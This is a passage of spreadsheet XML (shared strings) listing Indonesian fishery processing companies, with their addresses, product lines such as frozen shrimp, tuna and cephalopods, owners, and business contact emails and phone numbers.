    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Udang Beku, Kerang Beku</t>
  </si>
  <si>
    <t>BUDI WAHYONO</t>
  </si>
  <si>
    <t>Batang</t>
  </si>
  <si>
    <t>Karangasem Utara</t>
  </si>
  <si>
    <t>adimina.amm17@gmail.com</t>
  </si>
  <si>
    <t>0285-3970628</t>
  </si>
  <si>
    <t>BUDI WAHYONO  &amp; 085295811888</t>
  </si>
  <si>
    <t>PT. INDOHAMAFISH</t>
  </si>
  <si>
    <t>Jl. Gatot Kaca No.86, Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana</t>
  </si>
  <si>
    <t>Sarden Kaleng, Makerel Kaleng</t>
  </si>
  <si>
    <t>DJONI SURYA</t>
  </si>
  <si>
    <t>indohamafish@hotmail.com</t>
  </si>
  <si>
    <t>Sadikun/081246474129</t>
  </si>
  <si>
    <t>HENDRA WIJAYA</t>
  </si>
  <si>
    <t>PT. PANCA MITRA MULTIPERDANA</t>
  </si>
  <si>
    <t>Jl. Kurau RT 16, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan</t>
  </si>
  <si>
    <t>Soesilo Soebardjo, SH</t>
  </si>
  <si>
    <t>pmmp.trk.qc@gmail.com</t>
  </si>
  <si>
    <t>0551-2053497</t>
  </si>
  <si>
    <t>Hartoko 08115419611</t>
  </si>
  <si>
    <t>Hartoko</t>
  </si>
  <si>
    <t>CV. AZRA SENTOSA JAYA</t>
  </si>
  <si>
    <t>Jl. Strat 2 RT 17 No.30 , Kel. Gunung Samarinda, Kec. Balikpapan Utara, Kota Balikpapan</t>
  </si>
  <si>
    <t>Peyek Kepiting, Abon Tuna, Abon Kepiting</t>
  </si>
  <si>
    <t>Filsa Budi Ambia</t>
  </si>
  <si>
    <t>Balikpapan Utara</t>
  </si>
  <si>
    <t>Gunung Samarinda</t>
  </si>
  <si>
    <t>kampoengtimoer@gmail.com</t>
  </si>
  <si>
    <t>Filsa Budi Ambia/081</t>
  </si>
  <si>
    <t>CV. INDOSEA MAKMUR</t>
  </si>
  <si>
    <t>Kalimantan Selatan</t>
  </si>
  <si>
    <t>Jl. Lambung Mangkurat RT 013 RW 006, Kel. Gunung Makmur, Kec. Takisung, Kabupaten Tanah Laut</t>
  </si>
  <si>
    <t>Udang Rebon Asin Segar</t>
  </si>
  <si>
    <t>Eviridah Gumarus</t>
  </si>
  <si>
    <t xml:space="preserve">Takisung </t>
  </si>
  <si>
    <t>Gunung Makmur</t>
  </si>
  <si>
    <t>maryanisri194@yahoo.co.id</t>
  </si>
  <si>
    <t>Sri Maryani 08134813</t>
  </si>
  <si>
    <t>UD. MITRA BAHARI</t>
  </si>
  <si>
    <t>Jl. Besar Teluk Nibung, Kel. Pematang Pasir, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Rajungan Segar, Kerang Segar, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Yulius</t>
  </si>
  <si>
    <t>Pematang Pasir</t>
  </si>
  <si>
    <t>yuliuschai126@gmail.com</t>
  </si>
  <si>
    <t>Yulius 08126280106</t>
  </si>
  <si>
    <t>PT. MALUKU UTARA FISHERIES</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Pantai Bacan, Jl. Raya Desa Panamboang, Kel. Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Udang Beku, Ikan Pelagis Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Mon Myong Sub</t>
  </si>
  <si>
    <t>malutfisheries.bacan@gmail.com</t>
  </si>
  <si>
    <t>INDRIYANA IBRAHIM</t>
  </si>
  <si>
    <t>PT. LAUTAN DELI JAYA</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Gudang 9 Blok BG-BH , Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>RACHMADI</t>
  </si>
  <si>
    <t>ptlautan.delijaya@yahoo.com</t>
  </si>
  <si>
    <t>RAALI 081311479345</t>
  </si>
  <si>
    <t>PT. MAHKOTA MARITIM MAKMUR</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok S Kav 8-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Bandeng Beku, Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>HERYANTO</t>
  </si>
  <si>
    <t>suntorodedi@gmail.com</t>
  </si>
  <si>
    <t>021-6631270</t>
  </si>
  <si>
    <t>DEDI SUNTORO 085775515188</t>
  </si>
  <si>
    <t>CV. SUMBER BAHARI MANDIRI</t>
  </si>
  <si>
    <t>Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Teripang Kering, Abalone Kering, Telur Ikan Terbang Kering, Perut Ikan Kering, Rumput Laut Kering, Sirip Hiu Kering</t>
  </si>
  <si>
    <t>lily wisman</t>
  </si>
  <si>
    <t>Kapasa</t>
  </si>
  <si>
    <t>sumberbmandiri@gmail.com</t>
  </si>
  <si>
    <t>0411-510666</t>
  </si>
  <si>
    <t>yusri alamsyah / 081342587516</t>
  </si>
  <si>
    <t>PT. BERKAH MARITIM SENTOSA</t>
  </si>
  <si>
    <t>Jl. Tuna Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku, Bandeng Beku, Tuna Beku</t>
  </si>
  <si>
    <t>ptberkah2020@gmail.com</t>
  </si>
  <si>
    <t>Josua 081318883665</t>
  </si>
  <si>
    <t>PT. SURI TANI PEMUKA</t>
  </si>
  <si>
    <t>Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon</t>
  </si>
  <si>
    <t xml:space="preserve">Fillet Ikan Beku, Udang Berlapis Tepung Beku, Udang Bernilai Tambah Beku, Ikan Demersal Beku, Udang Mentah Beku, Salmon Bernilai Tambah Beku, Ikan Air Tawar Beku, Udang Rebus Beku, Produk Perikanan Bernilai Tambah Beku </t>
  </si>
  <si>
    <t>Budi Sumarlan</t>
  </si>
  <si>
    <t>Mundu</t>
  </si>
  <si>
    <t>Mundu Pesisir</t>
  </si>
  <si>
    <t>yeni.eliwandari@japfa.com</t>
  </si>
  <si>
    <t>0231-510458</t>
  </si>
  <si>
    <t>Dety / 08996343336</t>
  </si>
  <si>
    <t>PT. PAHALA SAMUDERA FISHERY INDUSTRIES</t>
  </si>
  <si>
    <t>Jl. Gajah Mada No.3-5 RT 001 RW 008 Komplek Duta Merlin Blok B 31-32, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Kagun Tanril</t>
  </si>
  <si>
    <t>qa@psfi.co.id</t>
  </si>
  <si>
    <t>(021) 6694846</t>
  </si>
  <si>
    <t>Erlan RIdha Iswara (</t>
  </si>
  <si>
    <t>Warni</t>
  </si>
  <si>
    <t>SAPUTRA SNACK</t>
  </si>
  <si>
    <t>Jl. Tenis Gg. Pro XL No.17 RT 38, Kel. Api-Api, Kec. Bontang Utara, Kota Bontang</t>
  </si>
  <si>
    <t>Keripik Ikan Bawis</t>
  </si>
  <si>
    <t>Nienik Rakhmawati Zauharoh</t>
  </si>
  <si>
    <t>Bontang Utara</t>
  </si>
  <si>
    <t>Api-Api</t>
  </si>
  <si>
    <t>saputra.snack.btg@gmail.com</t>
  </si>
  <si>
    <t>Nienik/081255193458</t>
  </si>
  <si>
    <t>PT. DACHAN MUSTIKA AURORA</t>
  </si>
  <si>
    <t>Jl. Kepiting RT 03, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan</t>
  </si>
  <si>
    <t>Udang Beku</t>
  </si>
  <si>
    <t>FIEYONO HIU</t>
  </si>
  <si>
    <t>qa.dachanmustika@gmail.com</t>
  </si>
  <si>
    <t>0551-2053558</t>
  </si>
  <si>
    <t>ASTRID YULIANA / 082253306813</t>
  </si>
  <si>
    <t>CATUR FEBRI WICAKSONO</t>
  </si>
  <si>
    <t>PT. LOUISIANA FAR EAST</t>
  </si>
  <si>
    <t>Jl. Rembang Industri II/36, 36A, 36B, Kawasan Berikat (EPZ) PIER, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Teripang Kering, Seafood Bernilai Tambah Beku dan Produk Vegetarian</t>
  </si>
  <si>
    <t>Mr. Chan Meng Soon</t>
  </si>
  <si>
    <t>Lsmfood@indo.net.id</t>
  </si>
  <si>
    <t>0343-740174</t>
  </si>
  <si>
    <t>Minita Ambarsari / 081331897117</t>
  </si>
  <si>
    <t>Yohanes Dwiari Danu Prasetyo</t>
  </si>
  <si>
    <t>PT. BONANZA PRATAMA ABADI</t>
  </si>
  <si>
    <t>Jl. P. Aji Iskandar RT 016, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Rebus Beku, Udang Nobashi Beku</t>
  </si>
  <si>
    <t>Pemegang Saham Bersama</t>
  </si>
  <si>
    <t>finance.bonanza@gmail.com</t>
  </si>
  <si>
    <t>0551-2053666</t>
  </si>
  <si>
    <t>Fong Yuh Cheng/0811539920</t>
  </si>
  <si>
    <t>Fong Yuh Cheng</t>
  </si>
  <si>
    <t>PT. INDO LAUTAN MAS</t>
  </si>
  <si>
    <t>Kel. Manembo Nembo, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>Rinda</t>
  </si>
  <si>
    <t xml:space="preserve">Manembo nembo </t>
  </si>
  <si>
    <t>info@indolautanmas.com</t>
  </si>
  <si>
    <t>0438-2230622</t>
  </si>
  <si>
    <t>Szendy &amp; 085341691979</t>
  </si>
  <si>
    <t>CV. MULTI LAUTAN MAS</t>
  </si>
  <si>
    <t>Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Tuna Segar, Ikan Pelagis Segar, Kepiting Segar, Kepiting Hidup, Sidat Hidup, Ikan Demersal Hidup</t>
  </si>
  <si>
    <t>rukho bondan wiseso</t>
  </si>
  <si>
    <t>bondanwiseso@ymail.com</t>
  </si>
  <si>
    <t>bondan &amp; 087771465466</t>
  </si>
  <si>
    <t>RUKHO BONDAN WISESO</t>
  </si>
  <si>
    <t>PT. BANGGAI INDO GEMILANG</t>
  </si>
  <si>
    <t>Jl. Raya Kilongan Km 5, Kel. Kilongan, Kec. Luwuk Utara, Kabupaten Banggai</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Demersal Segar, Fillet Ikan Beku</t>
  </si>
  <si>
    <t>Yani Tengkilisan</t>
  </si>
  <si>
    <t>Kilongan</t>
  </si>
  <si>
    <t>bigluwuk88@gmail.com</t>
  </si>
  <si>
    <t>JOSES</t>
  </si>
  <si>
    <t>Joses Michael Tengkilisan</t>
  </si>
  <si>
    <t>PT. CENTRALPERTIWI BAHARI PLANT II</t>
  </si>
  <si>
    <t>Kampung Mandiri, Kec. Dente Teladas, Kabupaten Tulangbawang</t>
  </si>
  <si>
    <t>Benjamin Djiaravanon</t>
  </si>
  <si>
    <t>Dente Teladas</t>
  </si>
  <si>
    <t>Kampung Mandiri</t>
  </si>
  <si>
    <t>arif.hadi@cpp.co.id</t>
  </si>
  <si>
    <t>Arief Kuntarto Hadi</t>
  </si>
  <si>
    <t>Arianto Yohan</t>
  </si>
  <si>
    <t>CV. HDT PONDO PRODUK</t>
  </si>
  <si>
    <t>Desa Karangmanggis RT 01 RW 01, Kec. Boja, Kabupaten Kendal</t>
  </si>
  <si>
    <t>Cangkang Rajungan, Tepung Ikan</t>
  </si>
  <si>
    <t>AMAN RAHMAT</t>
  </si>
  <si>
    <t>Boja</t>
  </si>
  <si>
    <t>Karangmanggis</t>
  </si>
  <si>
    <t>hdtpondoproduk98@gmail.com</t>
  </si>
  <si>
    <t>AMAN RAHMAT ( 081229</t>
  </si>
  <si>
    <t>PT. EBIMAS BESAR</t>
  </si>
  <si>
    <t>Jl. A.Yani Km 45,6, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut</t>
  </si>
  <si>
    <t>CHIEN HSIN TUNG</t>
  </si>
  <si>
    <t>Tambang Ulang</t>
  </si>
  <si>
    <t>Pulau Sari</t>
  </si>
  <si>
    <t>ptebimas@gmail.com</t>
  </si>
  <si>
    <t>Siti Kamariah</t>
  </si>
  <si>
    <t>PT. KELOLA PANGAN MAKMUR</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav. C-7, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Salmon Beku, Trout Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>PT. Kelola Usaha Makmur dan Mohammad Nadjikh</t>
  </si>
  <si>
    <t>kelolapangan@gmail.com</t>
  </si>
  <si>
    <t>031-3971666</t>
  </si>
  <si>
    <t>M. Fatoni</t>
  </si>
  <si>
    <t>H. Ir. Zainul Wasik</t>
  </si>
  <si>
    <t>PT. MUSTIKA MINANUSA AURORA</t>
  </si>
  <si>
    <t>Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anayar Pantai, Kec. Tarakan Barat, Kota Tarakan</t>
  </si>
  <si>
    <t>Kerang Hidup, Udang Mentah Beku, Udang Rebus Beku, Udang Nobashi Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Kepiting Masak Beku</t>
  </si>
  <si>
    <t>Tarakan Barat</t>
  </si>
  <si>
    <t>Karang Anyar Pantai</t>
  </si>
  <si>
    <t>jronnie1976@gmail.com</t>
  </si>
  <si>
    <t>0551-21112</t>
  </si>
  <si>
    <t>PT. GOLDEN BRIDGE INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi, Tuna Beku, Cephalopoda Beku, Ikan Demersal Beku, Kepiting Kulit Lunak Beku, Daging Rajungan Pasteurisasi Beku, Kepiting Beku, Udang Beku</t>
  </si>
  <si>
    <t>BINTARNA TARDY</t>
  </si>
  <si>
    <t>Klapanunggal</t>
  </si>
  <si>
    <t>Kembang Kuning</t>
  </si>
  <si>
    <t>qms.gbi@gmail.com</t>
  </si>
  <si>
    <t>021-82494646</t>
  </si>
  <si>
    <t>INGGIR LISBETH (081263975603)</t>
  </si>
  <si>
    <t>INGGIR LISBETH</t>
  </si>
  <si>
    <t>PT. WIRONTONO BARU</t>
  </si>
  <si>
    <t>Kawasan Industri Graha Permai Balaraja, Jl. Raya Serang KM 28, Kel. Tobat, Kec. Balaraja, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>ERIC HALIM</t>
  </si>
  <si>
    <t>Balaraja</t>
  </si>
  <si>
    <t>Tobat</t>
  </si>
  <si>
    <t>qa.wirontono6@gmail.com</t>
  </si>
  <si>
    <t>021-22595388</t>
  </si>
  <si>
    <t>EDDY KARMIN</t>
  </si>
  <si>
    <t>PT. SABINDO RAYA GEMILANG</t>
  </si>
  <si>
    <t>Jl. Gajah Mada No.01 Kompleks TPI Tarakan, Kel. Karang Anyar Pantai, Kec. Tarakan Barat, Kota Tarakan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Udang Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>PETER SETIAWAN</t>
  </si>
  <si>
    <t>sabindofish@gmail.com</t>
  </si>
  <si>
    <t>0551-2038807</t>
  </si>
  <si>
    <t>PT. PRIMA MUTIARA PERSADA</t>
  </si>
  <si>
    <t>Jl. Kamal Raya No. 15 RT 003 RW 002, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Belut Hidup, Sidat Hidup, Lobster Hidup, Kerang Hidup, Kepiting Hidup, Siput Hidup, Udang Ronggeng Hidup</t>
  </si>
  <si>
    <t>RAMLI TJAN</t>
  </si>
  <si>
    <t>primamutiarapersada@gmail.com</t>
  </si>
  <si>
    <t>BAYU HANAVI (085814719191)</t>
  </si>
  <si>
    <t>EDISON TANDIONO</t>
  </si>
  <si>
    <t>PT. JAWA SUISAN INDAH</t>
  </si>
  <si>
    <t>Jl. Cipatuguran SLK IPB Kampung Neglasari RT 03 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi</t>
  </si>
  <si>
    <t>Rupini</t>
  </si>
  <si>
    <t>jsuisanindah@yahoo.com</t>
  </si>
  <si>
    <t>0266 435112</t>
  </si>
  <si>
    <t>Riyanda Perdiansyah 085776827702</t>
  </si>
  <si>
    <t>Endang Suherman</t>
  </si>
  <si>
    <t>CV. SEMBADA</t>
  </si>
  <si>
    <t>Desa Sobontoro RT 002 RW 003, Kec. Tambakboyo, Kabupaten Tuban</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Kerang Beku, Udang Beku, Lobster Beku, Ikan Air Tawar Beku, Rajungan Beku, Teripang Beku, Ikan Kering, Cephalopoda Kering, Pari Beku, Gelembung Ikan Kering, Udang Kipas Beku, Teripang Kering, Ikan Asin</t>
  </si>
  <si>
    <t>ABDUL GHOFUR</t>
  </si>
  <si>
    <t>Tambakboyo</t>
  </si>
  <si>
    <t>Sobontoro</t>
  </si>
  <si>
    <t>tunaskarya50@yahoo.co.id</t>
  </si>
  <si>
    <t>ABDUL GHOFUR / 08124</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA (PERSERO) BENOA</t>
  </si>
  <si>
    <t>Jl. Raya Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Lainnya, Beku, Segar</t>
  </si>
  <si>
    <t>Lobster Hidup, Ikan Pelagis Beku, Ikan Pelagis Segar, Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>Farida Mokodompit</t>
  </si>
  <si>
    <t>perinusbenoa@gmail.com</t>
  </si>
  <si>
    <t>0361-723471</t>
  </si>
  <si>
    <t>Angelina F Siregar (0812 3737 9612)</t>
  </si>
  <si>
    <t>Ade Romansyah</t>
  </si>
  <si>
    <t>PT. MADSUMAYA INDO SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Kawasan Industri Gresik Kav C8 No.15, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>MARTHEN MONINGKA</t>
  </si>
  <si>
    <t>madsumaya.qa@gmail.com</t>
  </si>
  <si>
    <t>031-3982172</t>
  </si>
  <si>
    <t>TITIN A.L (085330088</t>
  </si>
  <si>
    <t>JEMMY WAHANI</t>
  </si>
  <si>
    <t>PT. SEKAR BUMI, TBK PLANT II</t>
  </si>
  <si>
    <t>Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Sambal Terasi Udang, Ikan Pelagis Beku, Cephalopoda Beku, Cephalopoda Masak Beku, Kerang Beku, Kerang Rebus Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>OEI HARRY LUKMITO</t>
  </si>
  <si>
    <t>Sidoarjo</t>
  </si>
  <si>
    <t>Pucang</t>
  </si>
  <si>
    <t>siskaqc@sekarbumi.net</t>
  </si>
  <si>
    <t>Taati 082334284355</t>
  </si>
  <si>
    <t>M ROSULI</t>
  </si>
  <si>
    <t>PT. YU SHEN FISHERY INDONESIA</t>
  </si>
  <si>
    <t>Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup, Udang Ronggeng Hidup, Siput Hidup, Abalon Hidup, Lobster Hidup, Kerang Hidup, Belut Hidup, Rajungan Hidup, Keong Laut Hidup, Udang Hidup, Kepiting Hidup</t>
  </si>
  <si>
    <t>NI MADE AYU WIDIANI</t>
  </si>
  <si>
    <t>Sesetan</t>
  </si>
  <si>
    <t>yu.shen168@yahoo.com</t>
  </si>
  <si>
    <t>Tjok Istri Oka Surad 085792311618</t>
  </si>
  <si>
    <t>PT. KALIMANTAN FISHERY</t>
  </si>
  <si>
    <t>Jl. Tanjung Berkat No. 3, Kel. Teluk Tiram, Kec. Banjarmasin Barat, Kota Banjarmasin</t>
  </si>
  <si>
    <t>Andree Setiono</t>
  </si>
  <si>
    <t>Banjarmasin Barat</t>
  </si>
  <si>
    <t>Teluk Tiram</t>
  </si>
  <si>
    <t>edo.kalfish@gmail.com</t>
  </si>
  <si>
    <t>Brian Edo Setiono</t>
  </si>
  <si>
    <t>PT. KML ICHIMASA FOODS</t>
  </si>
  <si>
    <t>Jl. Lambau (Kawasan Propindo Gemilang) Kp. Babakan Rawa Haur No.02 RT 004 RW 006, Kel. Sentul, Kec. Babakan Madang, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Stik Kepiting Analog Beku</t>
  </si>
  <si>
    <t>M Novi Saputro</t>
  </si>
  <si>
    <t>Babakan Madang</t>
  </si>
  <si>
    <t>Sentul</t>
  </si>
  <si>
    <t>kif@kmlichimasa.com</t>
  </si>
  <si>
    <t>021-8765931</t>
  </si>
  <si>
    <t>Legi Muhamad Destian / 082306331933</t>
  </si>
  <si>
    <t>Arif Rahmandita</t>
  </si>
  <si>
    <t>PT. PUTRI MANALU BERSAUDARA</t>
  </si>
  <si>
    <t>Jl. Sei Brantas No.81, Kel. Babura Sunggal, Kec. Medan Sunggal, Kota Medan</t>
  </si>
  <si>
    <t>Kering, Lainnya, Beku, Segar</t>
  </si>
  <si>
    <t>Teripang Kering, Kepiting Hidup, Siput Hidup, Kerang Hidup, Lobster Air Tawar Hidup, Lobster Air Tawar Beku, Daging Kepiting Rebus Beku, Udang Beku, Kepiting Kulit Lunak Beku, Ikan Demersal Segar, Kepiting Segar, Udang Segar, Udang Kering, Ikan Asin Kering</t>
  </si>
  <si>
    <t>Ir. Afdol Marolop Limbong</t>
  </si>
  <si>
    <t>Medan Sunggal</t>
  </si>
  <si>
    <t>Babura Sunggal</t>
  </si>
  <si>
    <t>ptputrimanalu@yahoo.com</t>
  </si>
  <si>
    <t>061-4515681</t>
  </si>
  <si>
    <t>Afdol 08129329245</t>
  </si>
  <si>
    <t>Giofani Manalu</t>
  </si>
  <si>
    <t>PT. DUA PUTRA UTAMA MAKMUR TBK</t>
  </si>
  <si>
    <t>Jl. Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel. Purworejo, Kec. Pati, Kabupaten Pati</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Udang Mentah Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Rebus Beku</t>
  </si>
  <si>
    <t>Witiarso Utomo</t>
  </si>
  <si>
    <t>Pati</t>
  </si>
  <si>
    <t>Purworejo</t>
  </si>
  <si>
    <t>darmidi@duaputra.com</t>
  </si>
  <si>
    <t>0295-4199011</t>
  </si>
  <si>
    <t>Slamet Subiyanto/082227991617</t>
  </si>
  <si>
    <t>R. Dwi Mamik Wijaya</t>
  </si>
  <si>
    <t>CV. JAVA FISH</t>
  </si>
  <si>
    <t>Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Ikan Pelagis Segar, Udang Kipas Segar, Udang Segar, Kerang Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Gunawan Drajad &amp; Levi Lee</t>
  </si>
  <si>
    <t>Bohar</t>
  </si>
  <si>
    <t>levilee@lgseafood.com</t>
  </si>
  <si>
    <t>0318553050 / 085102132224</t>
  </si>
  <si>
    <t>Sandra</t>
  </si>
  <si>
    <t>Levi Lee</t>
  </si>
  <si>
    <t>PT. BALI TUNA SEGAR</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya No.17 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Tuna Beku, Ikan Pelagis Beku, Tuna Segar</t>
  </si>
  <si>
    <t>Ir. Thomas Rhemus Prawiro</t>
  </si>
  <si>
    <t>ptbts_whole@yahoo.com</t>
  </si>
  <si>
    <t>Deasy Setyaningrum/ 082144895589</t>
  </si>
  <si>
    <t>PT. SIG ASIA</t>
  </si>
  <si>
    <t>Jl. Lumba-lumba Lingkungan IV,  RT 001 RW 004, Kel. Girian Bawah, Kec. Girian, Kota Bitung</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Mr. Loy</t>
  </si>
  <si>
    <t>Girian</t>
  </si>
  <si>
    <t>Girian Bawah</t>
  </si>
  <si>
    <t>fallery@sigasia.org</t>
  </si>
  <si>
    <t>Fallery 081244800222</t>
  </si>
  <si>
    <t>Fallery George</t>
  </si>
  <si>
    <t>PT. SEAFERMART JAYA RAYA</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.3 Muara Baru, Room 302 dan 602, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Ikan Demersal Beku, Tuna Segar, Ikan Demersal Segar, Ikan Pelagis Beku, Telur Ikan Beku, Bulu Babi Beku, Cephalopoda Beku, Kerang Beku</t>
  </si>
  <si>
    <t>VINCY WONG SUDARWO</t>
  </si>
  <si>
    <t>lgl2@seaferlumina.co.id</t>
  </si>
  <si>
    <t>EGA MARCELIN/081262124958</t>
  </si>
  <si>
    <t>SUKARDI</t>
  </si>
  <si>
    <t>PT. ENERGI PULAU SUJA</t>
  </si>
  <si>
    <t>Jl. Line Pipa, Dusun A, Kel. Paloh Punti, Kec. Muara Satu, Kota Lhokseumawe</t>
  </si>
  <si>
    <t>Lainnya, Segar, Kering</t>
  </si>
  <si>
    <t>Lobster Hidup, Udang Segar, Udang Kering</t>
  </si>
  <si>
    <t>NAZARUDDIN</t>
  </si>
  <si>
    <t>Muara Satu</t>
  </si>
  <si>
    <t>Paloh Punti</t>
  </si>
  <si>
    <t>energipulausuja@gmail.com</t>
  </si>
  <si>
    <t>0645-652715</t>
  </si>
  <si>
    <t>NAZARUDDIN 085334824581</t>
  </si>
  <si>
    <t>PT. REX CANNING</t>
  </si>
  <si>
    <t>Jl. Raya Beji - Bangil KM 4 No.42, Kel. Beji, Kec. Beji, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Kerang Batik Kaleng, Bekicot Kaleng, Udang Kaleng, Kerang Beku, Daging Rajungan Beku, Daging Rajungan Kaleng, Daging Rajungan Pasteurisasi Kaleng dan Pouch, Kerang Asap Kaleng</t>
  </si>
  <si>
    <t>DARMENDRAN KUNARETNAM</t>
  </si>
  <si>
    <t>qualitycontrol@rexfood.id</t>
  </si>
  <si>
    <t>0343-656470</t>
  </si>
  <si>
    <t>Diana 085852349148</t>
  </si>
  <si>
    <t>CHU SEANG MING</t>
  </si>
  <si>
    <t>PT. NAGAMA SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Tukad Punggawa No.238X Lingkungan Banjar Ponjok, Kel. Serangan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Kerapu Hidup, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Jacobus Tiaras</t>
  </si>
  <si>
    <t>Serangan</t>
  </si>
  <si>
    <t>nagamabalindo@gmail.com</t>
  </si>
  <si>
    <t>0361-8951087</t>
  </si>
  <si>
    <t>IBM Mahardika 081353635483</t>
  </si>
  <si>
    <t>IBP Wisnawa Manuaba</t>
  </si>
  <si>
    <t>PT. TRI MITRA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Palem No.52 RT 002 RW 003, Kel. Lingkas Ujung, Kec. Tarakan Timur, Kota Tarakan</t>
  </si>
  <si>
    <t>hirawan tedjo kosoemo</t>
  </si>
  <si>
    <t>Lingkas Ujung</t>
  </si>
  <si>
    <t>tmm.trk52@gmail.com</t>
  </si>
  <si>
    <t>0551-30700</t>
  </si>
  <si>
    <t>Hartoko dan  08115419611</t>
  </si>
  <si>
    <t>hartoko</t>
  </si>
  <si>
    <t>PT. INDOBOGA JAYA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.3 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Salmon Segar, Salmon Beku, Trout Beku, Cephalopoda Beku, Kerang Beku, Tuna Beku, Udang Beku, Trout Segar</t>
  </si>
  <si>
    <t>Banudojo Hastjarjo</t>
  </si>
  <si>
    <t>qc1@indoboga.com</t>
  </si>
  <si>
    <t>021-66696288</t>
  </si>
  <si>
    <t>PT. HASIL MELIMPAH</t>
  </si>
  <si>
    <t>Jl. Tuna III No.5 Area Parkir Muara Baru Center, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
